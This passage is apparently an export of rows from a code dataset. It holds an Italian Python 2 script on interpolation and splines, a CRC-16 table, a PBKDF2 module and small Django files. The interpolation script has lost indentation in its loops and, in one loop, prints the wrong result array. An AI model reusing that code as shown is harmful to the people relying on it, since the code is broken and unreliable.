    """Return the n+1 Chebyshev nodes mapped onto the interval [a, b]."""
    k = np.arange(0, n + 1)
    theta = (2 * k + 1) * np.pi / (2 * (n + 1))
    return (a + b + (b - a) * np.cos(theta)) / 2
def runge(x):
    """Runge's function 1/(1 + 25*x**2): the classic example where
    interpolation on equispaced nodes diverges near the endpoints."""
    # NOTE(review): under Python 2 an integer argument triggers integer
    # division here; pass floats/arrays for the intended result.
    y=1/(1+25*x**2)
    return y
def plotinterp(ftype,a,b,n,tn,baseType):
    """
    Plot the degree-n interpolating polynomial of a function on [a, b],
    using n+1 equispaced nodes if tn == 0 or n+1 Chebyshev nodes if tn == 1.

    ftype selects the target function:
        - 0 for cos(x)
        - 1 for Runge's function g(x) = 1/(1+25*x**2)
    baseType selects the basis:
        - 0 for the Lagrange basis
        - 1 for the power (monomial) basis

    Returns (max abs error, Lebesgue constant) when baseType == 0,
    or (max abs error, cond(A) of the Vandermonde matrix) when baseType == 1.
    """
    # Choose the interpolation nodes.
    if (tn==0):
        xnodi = np.linspace(a,b,n+1)
    else:
        xnodi = cheby(a,b,n)
    # Sample the target function at the nodes and on a fine evaluation grid.
    if (ftype==0):
        fname='f=cos(x)'
        f=np.cos
        fnodi = f(xnodi)
        xx = np.linspace(a,b,500)
        ye = f(xx)
    else:
        fname='g=1/(1+25*(x**2))'
        fnodi = gfunction(xnodi)
        xx = np.linspace(a,b,500)
        ye = gfunction(xx)
    # Evaluate the interpolant in the requested basis.
    if(baseType==0):
        fi, L = lagrange(xnodi,fnodi,xx)
        # Lebesgue constant = infinity norm of the Lebesgue function.
        Lc = las.norm(L, np.inf)
    else:
        fi, condA = potenze(xnodi, fnodi, xx)
    error = np.max(np.abs(fi-ye))
    # Plot (figure titles kept in Italian — they are runtime output).
    if(baseType==0):
        plt.figure(1)
        plt.cla()
        plt.title('Polinomio interpolante per la funzione %s con n= %i'%(fname, n))
        plt.plot(xx,fi,xnodi,fnodi,'o',xx,ye,'--')
        plt.figure(2)
        plt.cla()
        plt.plot(xx,L)
        plt.show()
    else:
        plt.figure(1)
        plt.cla()
        plt.title('Polinomio interpolante per la funzione %s con n= %i'%(fname, n))
        plt.plot(xx,fi,xnodi,fnodi,'o',xx,ye,'--')
        plt.show()
    if(baseType==0):
        return error, Lc
    else:
        return error, condA
def splineFunction(xnodi,fnodi, xx, fType, sType):
    """
    Plot a linear (sType == 0) or cubic (sType == 1) interpolating spline
    through (xnodi, fnodi) evaluated on xx, and record its maximum error.

    fType only selects the label shown in the plot title (0 = cos, 1 = Runge).

    NOTE(review): this function reads the module-level globals `yy` (exact
    function values on xx), `error` (a list it appends the max error to) and
    `i` (the figure number) instead of receiving them as parameters — it only
    works when called from the driver script below after those are set.
    """
    if(sType==0):
        s1 = interpolate.interp1d(xnodi, fnodi, 'linear')
        sname='lineare'
    else:
        s1 = interpolate.interp1d(xnodi, fnodi, 'cubic')
        sname='cubica'
    if(fType==0):
        fname='f=cos(x)'
    else:
        fname='g=1/(1+25*(x**2))'
    ys = s1(xx)
    error.append(np.max(np.abs(ys-yy)))
    plt.figure(i)
    plt.cla()
    plt.title('Spline %s per la funzione %s' %(sname,fname))
    plt.plot(xx,ys,xnodi,fnodi,'o',xx,yy,'--')
    plt.show()
def gfunction(x_variable):
    """Runge's function g(x) = 1/(1 + 25*x**2)."""
    denominator = 1 + 25 * (x_variable ** 2)
    return 1 / denominator
print("________________________________")
print("| POTENZE NODI EQUIDISTANTI |")
print("|______________________________|")
#prima funzione per n=4
a=0
b=2
n=4
numeroCondA = np.zeros([4,2])#Vettore in cui avviene lo store dei numeri di condizione della matrice A
numeroCondA[0]= plotinterp(0,a,b,n,0,1)
#prima funzione per n=16
n=16
numeroCondA[1] = plotinterp(0,a,b,n,0,1)
#seconda funzione per n=4
a = -1
b = 1
n=4
numeroCondA[2] = plotinterp(1,a,b,n,0,1)
#seconda funzione per n=16
n=16
numeroCondA[3] = plotinterp(1,a,b,n,0,1)
for i in range(0,4):
print numeroCondA[i]
print("________________________________")
print("| LAGRANGE NODI EQUIDISTANTI |")
print("|______________________________|")
erroreInterpE = np.zeros([4,2])#Vettore in cui avviene lo store degli errori per nodi equidistanti
#prima funzione per n=4
a = 0
b = 2
n=4
erroreInterpE[0] = plotinterp(0,a,b,n,0,0)
#prima funzione per n=16
n=16
erroreInterpE[1] = plotinterp(0,a,b,n,0,0)
#seconda funzione per n=4
a = -1
b = 1
n = 4
erroreInterpE[2] = plotinterp(1,a,b,n,0,0)
#seconda funzione per n=16
n=16
erroreInterpE[3] = plotinterp(1,a,b,n,0,0)
print("________________________________")
print("| POTENZE NODI DI CHEBYCHEV |")
print("|______________________________|")
#prima funzione per n=4
a=0
b=2
n=4
numeroCondAC = np.zeros([4,2])#Vettore in cui avviene lo store dei numeri di condizione della matrice A
numeroCondAC[0] = plotinterp(0,a,b,n,1,1)
#prima funzione per n=16
n=16
numeroCondAC[1] = plotinterp(0,a,b,n,1,1)
#seconda funzione per n=4
a = -1
b = 1
n=4
numeroCondAC[2] = plotinterp(1,a,b,n,1,1)
#seconda funzione per n=16
n=16
numeroCondAC[3] = plotinterp(1,a,b,n,1,1)
for i in range(0,4):
print numeroCondA[i]
print("_________________________________")
print("| LAGRANGE NODI DI CHEBYCHEV |")
print("|_______________________________|")
erroreInterpC = np.zeros([4,2])#Vettore in cui avviene lo store degli errori per nodi di Chebychev
#prima funzione per n=4
a = 0
b = 2
n=4
erroreInterpC[0] = plotinterp(0,a,b,n,1,0)
#prima funzione per n=16
n=16
erroreInterpC[1] = plotinterp(0,a,b,n,1,0)
#seconda funzione per n=4
a = -1
b = 1
n = 4
erroreInterpC[2] = plotinterp(1,a,b,n,1,0)
#seconda funzione per n=16
n=16
erroreInterpC[3] = plotinterp(1,a,b,n,1,0)
# interplazione con le funzioni spline
#funzione f
#4 nodi
f=np.cos
xx = np.linspace(a,b,200)
yy = f(xx)
error=[]
n=4
xnodi = np.linspace(a,b,n+1)
fnodi = f(xnodi)
splineFunction(xnodi, fnodi, xx, 0, 0)
splineFunction(xnodi, fnodi, xx, 0, 1)
#16 nodi
n=16
xnodi = np.linspace(a,b,n+1)
fnodi = f(xnodi)
splineFunction(xnodi, fnodi, xx, 0, 0)
splineFunction(xnodi, fnodi, xx, 0, 1)
#funzione g
#4 nodi
xx = np.linspace(a,b,200)
yy = gfunction(xx)
n=4
xnodi = np.linspace(a,b,n+1)
fnodi = gfunction(xnodi)
splineFunction(xnodi, fnodi, xx, 1, 0)
splineFunction(xnodi, fnodi, xx, 1, 1)
#16 nodi
n=16
xnodi = np.linspace(a,b,n+1)
fnodi = gfunction(xnodi)
splineFunction(xnodi, fnodi, xx, 1, 0)
splineFunction(xnodi, fnodi, xx, 1, 1)
print
print "ERRORE DELLA SPLINE"
for i in range(0,8):
if (i<4):
print 'Funzione f=cos(x)'
else:
print 'Funzione di Runge'
print error[i]
print("_________________________________")
print("| CONFRONTO ERRORI |")
print("| f = cos(x) |")
print("|_______________________________|")
print("ERRORE | NUMERO DI CONDIZIONE VANDERMONDE/COSTANTE DI LEBESGUE")
print("-----------------------------------------------------------------------------")
print("n = 4")
print("-----------------------------------------------------------------------------")
print numeroCondA[0],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[0],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[0],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[0],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("-----------------------------------------------------------------------------")
print("n = 16")
print("-----------------------------------------------------------------------------")
print numeroCondA[1],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[1],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[1],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[1],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("_________________________________")
print("| CONFRONTO ERRORI |")
print("| g=1/(1+25*(x**2)) |")
print("|_______________________________|")
print("ERRORE | NUMERO DI CONDIZIONE VANDERMONDE/COSTANTE DI LEBESGUE")
print("-----------------------------------------------------------------------------")
print("n = 4")
print("-----------------------------------------------------------------------------")
print numeroCondA[2],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[2],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[2],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[2],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("-----------------------------------------------------------------------------")
print("n = 16")
print("-----------------------------------------------------------------------------")
print numeroCondA[3],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[3],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[3],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[3],"Base di LAGRANGE e nodi di CHEBYCHEV"
| [
"agopel@gmail.com"
] | agopel@gmail.com |
d26c8d733fd5edcbcf3cdce1accbdc56c474b637 | d245c87a5082027f4b390210e0beae15ce19f321 | /python/crc16.py | d52d40b2e38a314dc0c4278bec53300ed81f03fc | [] | no_license | pazderski/spair-stm32-firmware | 9a85e83f1bbdb3fc55a440f039fc18d98e723815 | 26c3a226a4b7dec3e735ab4712f1ad36b97f4a8b | refs/heads/master | 2021-01-10T05:26:55.284937 | 2020-03-02T22:33:11 | 2020-03-02T22:33:11 | 36,146,152 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,635 | py | #* File: CRC16.PY
#* CRC-16 (reverse) table lookup for Modbus or DF1
#*
INITIAL_MODBUS = 0xFFFF
INITIAL_DF1 = 0x0000
table = (
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 )
def calcByte( ch, crc):
"""Given a new Byte and previous CRC, Calc a new CRC-16"""
if type(ch) == type("c"):
by = ord( ch)
else:
by = ch
crc = (crc >> 8) ^ table[(crc ^ by) & 0xFF]
return (crc & 0xFFFF)
def calcString( st, crc):
"""Given a binary string and starting CRC, Calc a final CRC-16 """
for ch in st:
crc = (crc >> 8) ^ table[(crc ^ ch) & 0xFF]
return crc
# end file
| [
"dariusz.pazderski@put.poznan.pl"
] | dariusz.pazderski@put.poznan.pl |
e89d6dc70ef70ba87520aa3295eb41f07cb4aaa9 | 2a3606551a4d850a7b4d6a4e08089c51108ef7be | /plugin.video.mrknow/resources/lib/crypto/keyedHash/pbkdf2.py | cf79523b747c13cbeb4fb110e54813a48c123a41 | [
"Apache-2.0"
] | permissive | rrosajp/filmkodi | a6bb1823f4ed45453c8b8e54ffbd6a7b49f44450 | 0162cde9ae25ddbf4a69330948714833ff2f78c9 | refs/heads/master | 2021-09-18T06:03:17.561062 | 2018-06-22T23:28:53 | 2018-06-22T23:28:53 | 234,768,781 | 1 | 0 | Apache-2.0 | 2021-06-03T20:33:07 | 2020-01-18T17:11:57 | null | WINDOWS-1252 | Python | false | false | 1,571 | py | # -*- coding: iso-8859-1 -*-
""" crypto.keyedHash.pbkdf2
Password Based Key Derivation Function 2
References: RFC2898, B. Kaliski, September 2000, PKCS #5
This function is used for IEEE 802.11/WPA passphrase to key hashing
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
"""
from ..keyedHash.hmacHash import HMAC_SHA1
from ..common import xor
from math import ceil
from struct import pack
def pbkdf2(password, salt, iterations, keySize, PRF=HMAC_SHA1):
    """Derive keySize bytes from password and salt (RFC 2898 PBKDF2).

    password    pass phrase (at most 63 characters)
    salt        salt mixed into the PRF input
    iterations  PRF iteration count per derived block
    keySize     number of key bytes to produce
    PRF         keyed pseudo-random function factory (default HMAC-SHA1)

    Raises ValueError for an over-long password or keySize.
    """
    if len(password) > 63:
        # was `raise 'Password too long...'` — string exceptions are invalid
        raise ValueError('Password too long for pbkdf2')
    #if len(password)<8 : raise 'Password too short for pbkdf2'
    if keySize > 10000:  # arbitrary guard; spec allows up to (2**32-1)*digestSize
        raise ValueError('keySize too long for PBKDF2')
    prf = PRF(key=password)  # HMAC_SHA1
    numBlocks = int(ceil(1.*keySize/prf.digest_size))  # ceiling of keySize/digest_size
    key = ''
    for block in range(1,numBlocks+1):
        # F(P, salt, iterations, i): U_1 = PRF(salt || INT_BE(i)), then
        # F = U_1 xor U_2 xor ... with U_c = PRF(U_{c-1}).
        U = prf(salt+pack('>i',block))  # block index packed into 4 big-endian bytes
        F = U                           # U_1 computed once (was computed twice)
        for count in range(2,iterations+1):
            U = prf(U)
            F = xor(F,U)
        key = key + F
    return key[:keySize]
def dot11PassPhraseToPSK(passPhrase,ssid):
    """ The 802.11 TGi recommended pass-phrase-to-preshared-key mapping.
        This function simply uses pbkdf2 with iterations=4096 and keySize=32
    """
    # Explicit ValueError instead of `assert`, which is stripped under -O.
    if not (7 < len(passPhrase) < 64):
        raise ValueError('Passphrase must be greater than 7 or less than 64 characters')
    return pbkdf2(passPhrase, ssid, iterations=4096, keySize=32)
| [
"mrknow@interia.pl"
] | mrknow@interia.pl |
6d5294bd220daf2939a8aa6af9e29395f72721da | 72c02a60f2a2894a148f5fb4c8ff62e0b0a7fc4e | /news_system/exception.py | 848ec9f9f4ef5f637e6ed55002df3f683d459caf | [] | no_license | Kamonnny/news_system | a798c258dc84efb9756889e2c9eace9b1216c5b3 | 476b4fc0eec8ecb7349cc5e44df990a629c600e4 | refs/heads/main | 2023-03-29T11:46:36.089419 | 2021-03-25T12:45:19 | 2021-03-25T12:45:19 | 314,820,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | class APIError(Exception):
""" 自定义错误类 """
def __init__(self, code: int = 400, msg: str = "ok", data: dict = None):
self.code = code
self.msg = msg
self.data = data or {}
| [
"EachinChung@gmail.com"
] | EachinChung@gmail.com |
5589f53032b5d4e17f0d40bc8a5c208b3fe36000 | 2fd46266ea2a0155d9de4e539970cf7fcdcdfc69 | /backhotel/migrations/0001_initial.py | c8c3e482f97eec20dc732a9c24929f5b19fa4b40 | [] | no_license | djcors/ultragroup | c31307cc7786838c0f016d06c4799b9c822026ef | 0c05014dd7702a99861b7b341883231b627c04d7 | refs/heads/master | 2023-01-13T23:17:49.642271 | 2019-11-13T03:29:58 | 2019-11-13T03:29:58 | 220,570,849 | 0 | 0 | null | 2023-01-07T11:34:22 | 2019-11-09T00:50:13 | JavaScript | UTF-8 | Python | false | false | 2,876 | py | # Generated by Django 2.2.7 on 2019-11-10 15:54
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates AgencyModel (a subclass of the
    auth User model), HotelModel and RoomModel with their foreign keys.
    Do not hand-edit the operations below."""

    initial = True

    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
    ]

    operations = [
        # AgencyModel: multi-table-inheritance subclass of auth.User
        # (one-to-one user_ptr primary key, default UserManager).
        migrations.CreateModel(
            name='AgencyModel',
            fields=[
                ('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'AgencyModel',
                'verbose_name_plural': 'AgencyModels',
            },
            bases=('auth.user',),
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
        # HotelModel: belongs to an agency (cascade delete).
        migrations.CreateModel(
            name='HotelModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(db_index=True, max_length=100, verbose_name='name')),
                ('active', models.BooleanField(default=True)),
                ('code', models.CharField(max_length=30, verbose_name='code')),
                ('category', models.PositiveSmallIntegerField(default=3, verbose_name='category')),
                ('agency', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='agency_hoteles', to='backhotel.AgencyModel')),
            ],
            options={
                'verbose_name': 'HotelModel',
                'verbose_name_plural': 'HotelModels',
            },
        ),
        # RoomModel: belongs to a hotel (cascade delete).
        migrations.CreateModel(
            name='RoomModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(db_index=True, max_length=100, verbose_name='name')),
                ('active', models.BooleanField(default=True)),
                ('code', models.CharField(max_length=30, verbose_name='code')),
                ('room_type', models.CharField(max_length=50, verbose_name='type')),
                ('base_price', models.PositiveIntegerField(verbose_name='price')),
                ('tax', models.PositiveIntegerField(verbose_name='% tax')),
                ('location', models.CharField(max_length=250, verbose_name='location')),
                ('hotel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hotel_rooms', to='backhotel.HotelModel')),
            ],
            options={
                'verbose_name': 'RoomModel',
                'verbose_name_plural': 'RoomModels',
            },
        ),
    ]
| [
"jonathan.cortes@inmersa.co"
] | jonathan.cortes@inmersa.co |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.